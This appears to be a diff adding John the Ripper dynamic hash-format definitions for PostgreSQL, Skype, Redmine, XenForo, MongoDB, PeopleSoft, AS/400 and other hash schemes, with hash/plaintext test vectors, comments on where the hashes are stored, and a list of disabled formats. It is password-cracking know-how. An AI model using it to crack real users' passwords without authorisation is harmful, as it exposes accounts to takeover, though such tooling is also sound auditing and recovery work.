+Test=$dynamic_1033$DfM7ryjrNamyG0wRS6CwheZS6Mo$3swBL4qn:
+
+####################################################################
+# Dynamic type for md5($p.$u) for PostgreSQL stored MD5 hashes
+# See also dynamic_1015 for PostgreSQL 'pass the hash' (with salt)
+####################################################################
+[List.Generic:dynamic_1034]
+Expression=md5($p.$u) (PostgreSQL MD5)
+Flag=MGF_USERNAME
+SaltLen=-32
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1034$bd6fd49a627ecdbe4031b2d52d5748ab:openwall:postgres
+Test=$dynamic_1034$32e12f215ba27cb750c9e093ce4b5127:password:postgres
+
+[List.Generic:dynamic_1300]
+MaxInputLen=55
+MaxInputLenX86=110
+Flag=MGF_POOR_OMP
+Expression=md5(md5_raw($p))
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+# changed these 3 lines to the 4 lines that follow. This format has had problems
+# in certain builds (like generic). Likely it is the set_input_len_16 causing
+# issues and should be looked at. For now, the new method using input2 works fine.
+#Func=DynamicFunc__crypt_md5_to_input_raw
+#Func=DynamicFunc__set_input_len_16
+#Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append2_from_last_output1_as_raw
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1300$43442676c74ae59f219c2d87fd6bad52:admin
+Test=$dynamic_1300$5cbaca32e76bb49ca69657a9145d77ee:test1
+Test=$dynamic_1300$1c8b12da6f307bbfe8d245c79d468b3d:test3
+TestM=$dynamic_1300$60f3fd93d4e949d871dc7713664b2b4e:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1300$d66e6e66ff4a8dc6f3665740268fe1bc:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1350]
+Expression=md5(md5($s.$p):$s)
+# Flag needed here, is Salt.
+CONST1=:
+Flag=MGF_SALTED
+SaltLen=2
+MaxInputLen=53
+MaxInputLenX86=108
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_from_last_output_as_base16
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1350$c1f58952ab714b5ef76926628f6e0b16$92:blondie
+Test=$dynamic_1350$a130dbe6709653d602eec70945e14f87$9e:blondie
+TestM=$dynamic_1350$0f7dcf84c95a3c191a4bff15c62058a0$12:12345678901234567890123456789012345678901234567890123
+TestF=$dynamic_1350$f78bdbc1c68b64f52c40d777068309fb$12:123456789012345678901234567890123456789012345678901234567890123456789012345678
+
+# Thanks to JimF for his help in making this format work
+# (Jean-Michel Picod)
+[List.Generic:dynamic_1400]
+Expression=sha1(utf16($p)) (Microsoft CREDHIST)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_StartInX86Mode
+Flag=MGF_POOR_OMP
+Flag=MGF_UTF8
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+#Test=$dynamic_1500$e8f97fba9104d1ea5047948e6dfb67fa:password
+Test=$dynamic_1400$e8f97fba9104d1ea5047948e6dfb67facd9f5b73:password
+
+# Thanks JimF for his help making this format to work
+# (Jean-Michel Picod)
+[List.Generic:dynamic_1401]
+Expression=md5($u.\nskyper\n.$p) (Skype MD5)
+Flag=MGF_USERNAME
+Flag=MGF_StartInX86Mode
+Flag=MGF_INPUT_20_BYTE
+CONST1=\x0Askyper\x0A
+# 23 gives us ability to do user names up to 55-8-23 (or 24 byte user names)
+# this should be ported to a flat format.
+MaxInputLen=23
+MaxInputLenX86=110
+SaltLen=-24
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt
+# NOTE, I did not have full 40 byte hashes, but am using the INPUT_20_BYTE flag.
+# The last 8 0's are only used for valid to work, and so we can add full hashes
+# when we get them. Only the first 16 bytes is used in hash compare within JtR
+Test=$dynamic_1401$27f6a9d892475e6ce0391de8d2d893f700000000:password:username
+Test=$dynamic_1401$27f6a9d892475e6ce0391de8d2d893f700000000$$Uusername:password
+# repeat that hash in exactly the same form that is used in john.pot
+Test=$dynamic_1401$27f6a9d892475e6ce0391de8d2d893f700000000$HEX$2455757365726e616d65:password
+
+# In Redmine, the hashed password is stored in the following form,
+# SHA1(salt + SHA1(password))
+#
+# $ mysql -u root -p
+# mysql> use bitnami_redmine;
+# Database changed
+# mysql> select * from users
+[List.Generic:dynamic_1501]
+Expression=sha1($s.sha1($p)) (Redmine)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA1
+SaltLen=32
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1501$dd49e260795cb71da6904b9bccec30cb79b189f5$21737e0ab18ae77caec21f73c6e60c8d:redminecrap
+Test=$dynamic_1501$713769f2b8824e8f5abc2d3e4f9326f32ff1d46b$5bfe6f1c0f7a8d802032d1bf85225400:redminefff
+
+# In XenForo, the hashed password is stored in the following form(s),
+# sha1(sha1(password).salt)
+#
+# OR
+#
+# sha256(sha256(password).salt)
+#   NOTE, added MGF_KEYS_BASE16_IN1_SHA1 and MGF_KEYS_BASE16_IN1_SHA256 flags
+#   and the many salts speed is now greatly improved.
+[List.Generic:dynamic_1502]
+Expression=sha1(sha1($p).$s) (XenForo SHA-1)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA1
+SaltLen=-120  // dont know, so made it big, jfoug
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__set_input_len_40
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1502$fd74fa6521e515921ad843a8465e34b703960db1$dummysalt:password
+
+# note this hash could use the pre-compute limb-1 optimization we are wanting to do.
+# that would take it from 3 sha256 limbs to 1 sha256 limb (in many salts). Right now,
+# we have reduced it from 3 limbs to 2 limbs (for many salts).
+[List.Generic:dynamic_1503]
+Expression=sha256(sha256($p).$s) (XenForo SHA-256)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA256
+MaxInputLenX86=110
+SaltLen=-120  // dont know, so made it big, jfoug
+MaxInputLen=110
+Func=DynamicFunc__set_input_len_64
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1503$453f2e21fa6c150670d3ecf0e4a0ff3bab8b1903c2e96ad655d960b95f104248$697de9eda4a02563a7ec66d42d4a96995cb2948e29ab76fbcc89e8db71dd10f1:password
+Test=$dynamic_1503$a8a0e9545c1475e8546f8546d87fe2516cf525c12ad79a6a7a8fee2fb0d8afd3$697de9eda4a02563a7ec66d42d4a96995cb2948e29ab76fbcc89e8db71dd10f1:verlongcrappypassword01234567890
+
+# http://wiki.insidepro.com/index.php/sha1($a.$p.$s)
+[List.Generic:dynamic_1504]
+Expression=sha1($s.$p.$s)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+SaltLen=-68  // dont know, so made it max size that fits in 4 limb buffer, jfoug
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1504$114e4978430ee4fe2bc492f059f5c7aa400bf2fe$Salt:abcd
+Test=$dynamic_1504$aab04277ffba1dee47288b05fa58d25e49a1935e$Salt:12345678
+Test=$dynamic_1504$3b71a92fb2f4aeda9ae38211b67c5a4dc2a1771a$Salt:
+
+# md5($p.$s.md5($p.$s)) (saw it on https://hashcat.net/trac)
+[List.Generic:dynamic_1505]
+Expression=md5($p.$s.md5($p.$s))
+# to make flat (allows much longer passwords and salts)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+SaltLen=-64
+Flag=MGF_SALTED
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_keys2
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_1505$b8bbabb1eb9802a2e962de0207ca5172$aaaSXB:test1
+
+# https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/
+[List.Generic:dynamic_1506]
+Expression=md5($u.:XDB:.$p) (Oracle 12c "H" hash)
+Flag=MGF_USERNAME
+CONST1=:XDB:
+MaxInputLen=23
+MaxInputLenX86=110
+SaltLen=-27
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt
+Test=$dynamic_1506$dc9894a01797d91d92eca1da66242209:epsilon:DEMO
+
+# salt here is really a const.
+[List.Generic:dynamic_1507]
+Expression=sha1(utf16($const.$p)) (Mcafee master pass)
+CONST1=\x01\x0f\x0d\x33
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_INPUT_20_BYTE
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1507$d4eaf666d09316f9d61b14753353a73d5fbcf048:test
+Test=$dynamic_1507$9dbe0d0ea16ae0a14c0c81a7c962b5a16e777259:test1
+
+# Newer SunShop Shopping Cart. Older SunShop 4.1.0 uses md5($p) as the hashing
+# scheme. It seems that both these hash types can live together in a single
+# SunShop database.
+[List.Generic:dynamic_1518]
+Expression=md5(sha1($p).md5($p).sha1($p))
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_1518$c756b56aed8d6748ee63e1e270c71a3f:password
+Test=$dynamic_1518$8e6db6b58e9e326aba17e19a36c79d95:menura
+Test=$dynamic_1518$2abe0f6794cc57663527ce7ab81fdaf3:stealth
+Test=$dynamic_1518$08793c9ab17a586b3af71d28e1cae2c1:fletch
+Test=$dynamic_1518$b19d46258f6a00f151367024789d71f1:smurfs
+Test=$dynamic_1518$065c78f47a7da2e2ca2bd76eed10f6cd:ralphy1
+Test=$dynamic_1518$82f7dd8a757d1a79126817940336087d:Kitesurfing1
+
+# Telegram for Android hashes. Use ../run/telegram2john.py to extract the hashes.
+[List.Generic:dynamic_1528]
+Expression=sha256($s.$p.$s) (Telegram for Android)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+SaltLen=16
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1528$dab5552484cc327bd6d23b2a1ceb55b6ffb30f305bc09962a9102a6cec63773c$HEX$9533cd79bf8739bdd47ff8998aaf578c:1234
+Test=$dynamic_1528$cad3fe1d4df2bf68c23f003e771c79fa42d10ae9a03671019d9c91a266a91372$HEX$901c3371d7de4b525b0e0a6abf4f392e:0987
+
+# DeepSound hashes. Use ../run/deepsound2john.py to extract the hashes.
+[List.Generic:dynamic_1529]
+Expression=sha1($p null_padded_to_len_32) (DeepSound)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_FLAT_BUFFERS
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__set_input_len_32
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1529$6f9fa2285514c73bcac858496361f19f477ee416:deep5ound
+Test=$dynamic_1529$66cad8923499423fa0c1d3974256d957840b9d69:iqlusion
+Test=$dynamic_1529$a3eb15172cc7e6090a2eb32e6dc8c3bd30c39a02:abcdefghijklmnopqrstuvwxyz012345
+
+# MONGODB-CR system hashes
+# Input hash format => username:$dynamic_1550$hash
+[List.Generic:dynamic_1550]
+Expression=md5($u.:mongo:.$p) (MONGODB-CR system hash)
+Flag=MGF_USERNAME
+CONST1=:mongo:
+MaxInputLen=23
+MaxInputLenX86=110
+# note, saltlen + length(:mongo:) + length(plain) must stay <= 55 for SIMD
+#   so 25+7+23 == 55
+SaltLen=-25
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt
+Test=$dynamic_1550$08f32db65f837a52cd791bd923a61e95$$Usomeadmin:secret
+Test=$dynamic_1550$819951ad797c3564148a77cbecf3b166$$Uadmin:secret@12345
+
+# MONGODB-CR network hashes  (user name < 8 bytes long)
+# Input hash format => username:$dynamic_1551$hash$salt$$Uusername
+[List.Generic:dynamic_1551]
+Expression=md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+Flag=MGF_USERNAME
+CONST1=:mongo:
+MaxInputLen=23
+MaxInputLenX86=110
+# note, saltlen + length(:mongo:) + length(plain) must stay <= 55 for SIMD
+#   so 25+7+23 == 55
+SaltLen=16
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_userid2
+Func=DynamicFunc__crypt
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1551$0c85e3f74adce5d037426791940c820a$58d3229c83e3f87e$$Usa:sa
+Test=$dynamic_1551$797d7e18879446845f10ae9d519960b2$10441db416a99ffc$$Usa:longpassword
+Test=$dynamic_1551$a5ca2c517c06fdfb773144d53fb26f56$9b90cf265f3194d7$$UHerman:123456789
+Test=$dynamic_1551$441d6ece7356c67dcc69dd26e7e0501f$be8fa52f0e64c250$$Usz110:passWOrd
+Test=$dynamic_1551$c95e106f1d9952c88044a0b21a6bd3fd$304b81adddfb4d6f$$Ujack:
+
+# MONGODB-CR network hashes  (user name >= 8 bytes long)
+# Input hash format => username:$dynamic_1552$hash$salt$$Uusername
+[List.Generic:dynamic_1552]
+Expression=md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+Flag=MGF_USERNAME
+Flag=MGF_FLAT_BUFFERS
+CONST1=:mongo:
+MaxInputLen=110
+MaxInputLenX86=110
+SaltLen=16
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_userid2
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_1552$10290925d16d81e50db242c9f3572d91$0000000000000000$$Ulongusername:longpassword@12345678
+Test=$dynamic_1552$53257e018399a241849cb04c70ba8daa$0000000000000000$$Ulongusername:longpassword
+Test=$dynamic_1552$1abe48bac6ad0bf567ab51b094f026a9$86336266301fb552$$Ulongusername:longpassword
+Test=$dynamic_1552$5c414259f7f7a42f8c4d1b6ffb37913a$8c82aec197929775$$Ueight18_characters:123
+
+# SocialEngine hashes (Elijah [W&P])
+#
+# hash = md5('core secret'.'password'.'salt')
+# core.secret -> MySQL 'engine4_core_settings' table, row 'core.secret'
+# salt -> MySQL 'engine4_users' table, 'salt' column
+[List.Generic:dynamic_1560]
+Expression=md5($s.$p.$s2) (SocialEngine)
+Flag=MGF_SALTED
+Flag=MGF_SALTED2
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-46
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_2nd_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_1560$55fce7789372d510023fc819c0ce55a6$a6ebe407fa6e2337cb2deb573d17791e$$21060744:test1
+Test=$dynamic_1560$fd880f2c10f148c409f3c850a52201b0$6cbe843e024f59827c55f3a32d1c3be9$$22262250:thatsworking
+Test=$dynamic_1560$2b199a07acf8e9e36e47ec2a0178933b$2a4c7cf421315f49fae230e80acfa218$$29597016:test3
+Test=$dynamic_1560$13d806a7e87bc1b551478742349882a9$2161869cadcb41f1cc1e939f191c0bb35e58a9a7$$21060744:123123
+
+# ColdFusion 11 hashes (Ivan Novikov <in@wallarm.com>)
+# Hash is password variable from ./lib/password.properties
+# Salt is admin.userid.root.salt variable from ./lib/neo-security.xml
+[List.Generic:dynamic_1588]
+Expression=sha256($s.sha1($p)) (ColdFusion 11)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_BASE_16_OUTPUT_UPCASE
+SaltLen=64
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys2
+Func=DynamicFunc__SHA1_crypt_input2_append_input1
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1588$37F816D599BFD69C5A0D750198AB6E46E26CEB120C9AF3B1E5306515058CBAE8$D7B6D57262290BC0A634D2D1A0DFE59F1FBE47885DBC9BB1CEBA8EA9D09D9839:test1234
+
+# IBM AS/400 SHA1 hashes   !NOTE, salt is pre prepared, utf16be(space_pad_10(uc($user_name))
+[List.Generic:dynamic_1590]
+Expression=sha1(utf16be(space_pad_10(uc($s)).$p)) (IBM AS/400 SHA1)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_BASE_16_OUTPUT_UPCASE
+Flag=MGF_UTF8
+SaltLen=20
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__setmode_unicodeBE
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1590$4C106E52CA196986E1C52C7FCD02AF046B76C73C$HEX$0052004F00420020002000200020002000200020:banaan
+Test=$dynamic_1590$CED8050C275A5005D101051FF5BCCADF693E8AB7$HEX$0042004100520054002000200020002000200020:Kulach007
+Test=$dynamic_1590$1BA6C7D54E9696ED33F4DF201E348CA8CA815F75$HEX$005300590053004F005000520020002000200020:T0Psecret!
+Test=$dynamic_1590$A1284B4F1BDD7ED598D4B5060D861D6D614620D3$HEX$00530059005300540045004D0020002000200020:P@ssword01
+Test=$dynamic_1590$94C55BC7EDF1996AC62E8145CDBFA285CA79ED2E$HEX$0051005300590053004400420041002000200020:qsysdba
+Test=$dynamic_1590$CDF4063E283B51EDB7B9A8E6E542042000BD9AE9$HEX$0051005300450043004F00460052002000200020:qsecofr!
+Test=$dynamic_1590$44D43148CFE5CC3372AFD2610BEE3D226B2B50C5$HEX$0054004500530054003100200020002000200020:password1
+Test=$dynamic_1590$349B12D6588843A1632649A501ABC353EBF409E4$HEX$0054004500530054003200200020002000200020:secret
+Test=$dynamic_1590$A97F2F9ED9977A8A628F8727E2851415B06DC540$HEX$0054004500530054003300200020002000200020:test3
+
+# wbb3 SHA1 hashes
+[List.Generic:dynamic_1592]
+Expression=sha1($s.sha1($s.sha1($p))) (wbb3)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA1
+Flag=MGF_FULL_CLEAN_REQUIRED2
+SaltLen=40
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__LargeHash_set_offset_40
+Func=DynamicFunc__SHA1_crypt_input2_at_offset_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1592$e2063f7c629d852302d3020599376016ff340399$0b053db07dc02bc6f6e24e00462f17e3c550afa9:123456
+Test=$dynamic_1592$f6975cc560c5d03feb702158d08f90bf2fa773d6$0b053db07dc02bc6f6e24e00462f17e3c550afa9:password
+Test=$dynamic_1592$2c56d23b44eb122bb176dfa2a1452afaf89f1143$a710463f75bf4568d398db32a53f9803007388a3:123456
+Test=$dynamic_1592$2596b5f8e7cdaf4b15604ad336b810e8e2935b1d$1039145e9e785ddb2ac7ccca89ac1b159b595cc1:12345678
+Test=$dynamic_1592$26496a87c1a7dd68f7beceb2fc40b6fc4223a453$db763342e23f8ccdbd9c90d1cc7896d80b7e0a44:12345678
+Test=$dynamic_1592$d945c02cf85738b7db4f4f05edd676283280a513$bf2c7d0c8fb6cb146adf8933e32da012d31b5bbb:123456789
+Test=$dynamic_1592$e3e03fe02223c5030e834f81997f614b43441853$d132b22d3f1d942b99cc1f5fbd5cc3eb0824d608:1234567890
+
+# All credit for this format goes to Alexey Tyurin (ERPScan), François Gaudreault, and Martin Lemay
+# http://gosecure.net/2016/05/04/oracle-peoplesoft-still-a-threat-for-enterprises/ (source)
+# https://erpscan.com/press-center/blog/peoplesoft-security-part-4-peoplesoft-pentest-using-tokenchpoken-tool/
+# https://erpscan.com/wp-content/uploads/tools/ERPScan-tockenchpoken.zip
+[List.Generic:dynamic_1600]
+Expression=sha1($s.utf16le($p)) (Oracle PeopleSoft PS_TOKEN)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_SALTED
+Flag=MGF_UTF8
+SaltLen=-150
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1600$e6155f87b073451076d81e3505f8b9fcd3f53b5a$HEX$710000000403020101000000bc0200000000000010500050005700450042004500580054000645004e0047000e50005300460054005f00480052003432003000310036002d00300034002d00300038002d00310039002e00320037002e00300035002e0030003000300030003000320000:password
+Test=$dynamic_1600$b5e335754127b25ba6f99a94c738e24cd634c35a$HEX$aa07d396f5038a6cbeded88d78d1d6c907e4079b3dc2e12fddee409a51cc05ae73e8cc24d518c923a2f79e49376594503e6238b806bfe33fa8516f4903a9b4:hashcat
+Test=$dynamic_1600$ac869d82e768c1af0e2b80679ddee8efe769d480$HEX$650000000403020101000000bc0200000000000004500053000645004e0047000e50005300460054005f00480052003432003000310035002d00300037002d00300031002d00300038002e00300036002e00340036002e0039003900390035003400330000:password@12345
+
+# https://github.com/neo-project/neo-gui (tested with Neo GUI v2.3.2)
+[List.Generic:dynamic_1608]
+Expression=sha256(sha256_raw(sha256_raw($p))) (Neo Wallet)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_INPUT_32_BYTE
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__LargeHash_OUTMode_raw
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA256_crypt_input1_overwrite_input2
+Func=DynamicFunc__SHA256_crypt_input2_overwrite_input2
+Func=DynamicFunc__SHA256_crypt_input2_to_output1_FINAL
+Test=$dynamic_1608$f2a778f1a6ed3d5bc59a5d79104c598f3f07093f240ca4e91333fb09ed4f36da:abc
+Test=$dynamic_1608$8b12147de49a2832aca47a5bf6fbca12689420ac14c2547ab90f6d495f21f6dc:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEF
+Test=$dynamic_1608$2a1a9918abe22f14d737462301e0c17b125a5f9ba11dc1e872b5320180437d12:openwall
+
+# https://www.oneidentity.com/products/authentication-services/
+# Author: Tim Brown. Borrowed from https://github.com/portcullislabs/linikatz (under BSD 3-Clause "New" or "Revised" License).
+[List.Generic:dynamic_1602]
+Expression=sha256(#.$salt.-.$pass) (QAS vas_auth)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_USERNAME
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+CONST1=#
+CONST2=-
+SaltLen=36
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_input1_from_CONST2
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1602$9b4d1328a3dc064704301d2da2975f97b9212d8f08539214b27fd3106dc208ff$C34208EA-8C33-473D-A9B4-53FB40347EA0:P0rtcu11i5!:Administrator@3rd-party.example.org
+
+# this should be last line of the file.  Put other formats before this.  The formats in
+# the following included file are replacement formats for the MD4/5 formats which use
+# 'intermixed' SSE for speed, BUT which can not process longer passwords, due to being
+# limited to a single SSE buffer.  The formats in dynamic_flat_sse_formats.conf are using
+# the large hash 'flat' methods, which allow multiple SSE buffers. They are slower (sometimes
+# a LOT slower), than the intermixed SSE.  But they are much faster than oSSL code, and can
+# take full length passwords (110 bytes).
+
+.include <dynamic_flat_sse_formats.conf>
@@ -0,0 +1,525 @@
+# the set of dynamics was not disabled due to not working, but due to simply
+# being academic formats, and test cases, and not ITW formats
+dynamic_51 = Y
+dynamic_52 = Y
+dynamic_53 = Y
+dynamic_54 = Y
+dynamic_55 = Y
+dynamic_56 = Y
+dynamic_57 = Y
+dynamic_58 = Y
+# dyna-61 used by formspring and should not be disabled.
+dynamic_61 = N
+dynamic_62 = Y
+dynamic_63 = Y
+dynamic_64 = Y
+dynamic_65 = Y
+dynamic_66 = Y
+dynamic_67 = Y
+dynamic_68 = Y
+dynamic_71 = Y
+dynamic_72 = Y
+dynamic_73 = Y
+dynamic_74 = Y
+dynamic_75 = Y
+dynamic_76 = Y
+dynamic_77 = Y
+dynamic_78 = Y
+dynamic_81 = Y
+dynamic_82 = Y
+dynamic_83 = Y
+dynamic_84 = Y
+dynamic_85 = Y
+dynamic_86 = Y
+dynamic_87 = Y
+dynamic_88 = Y
+dynamic_91 = Y
+dynamic_92 = Y
+dynamic_93 = Y
+dynamic_94 = Y
+dynamic_95 = Y
+dynamic_96 = Y
+dynamic_97 = Y
+dynamic_98 = Y
+dynamic_101 = Y
+dynamic_102 = Y
+dynamic_103 = Y
+dynamic_104 = Y
+dynamic_105 = Y
+dynamic_106 = Y
+dynamic_107 = Y
+dynamic_108 = Y
+dynamic_111 = Y
+dynamic_112 = Y
+dynamic_113 = Y
+dynamic_114 = Y
+dynamic_115 = Y
+dynamic_116 = Y
+dynamic_117 = Y
+dynamic_118 = Y
+dynamic_121 = Y
+dynamic_122 = Y
+dynamic_123 = Y
+dynamic_124 = Y
+dynamic_125 = Y
+dynamic_126 = Y
+dynamic_127 = Y
+dynamic_128 = Y
+dynamic_131 = Y
+dynamic_132 = Y
+dynamic_133 = Y
+dynamic_134 = Y
+dynamic_135 = Y
+dynamic_136 = Y
+dynamic_137 = Y
+dynamic_138 = Y
+dynamic_141 = Y
+dynamic_142 = Y
+dynamic_143 = Y
+dynamic_144 = Y
+dynamic_145 = Y
+dynamic_146 = Y
+dynamic_147 = Y
+dynamic_148 = Y
+dynamic_151 = Y
+dynamic_152 = Y
+dynamic_153 = Y
+dynamic_154 = Y
+dynamic_155 = Y
+dynamic_156 = Y
+dynamic_157 = Y
+dynamic_158 = Y
+dynamic_161 = Y
+dynamic_162 = Y
+dynamic_163 = Y
+dynamic_164 = Y
+dynamic_165 = Y
+dynamic_166 = Y
+dynamic_167 = Y
+dynamic_168 = Y
+dynamic_171 = Y
+dynamic_172 = Y
+dynamic_173 = Y
+dynamic_174 = Y
+dynamic_175 = Y
+dynamic_176 = Y
+dynamic_177 = Y
+dynamic_178 = Y
+dynamic_181 = Y
+dynamic_182 = Y
+dynamic_183 = Y
+dynamic_184 = Y
+dynamic_185 = Y
+dynamic_186 = Y
+dynamic_187 = Y
+dynamic_188 = Y
+dynamic_191 = Y
+dynamic_192 = Y
+dynamic_193 = Y
+dynamic_194 = Y
+dynamic_195 = Y
+dynamic_196 = Y
+dynamic_197 = Y
+dynamic_198 = Y
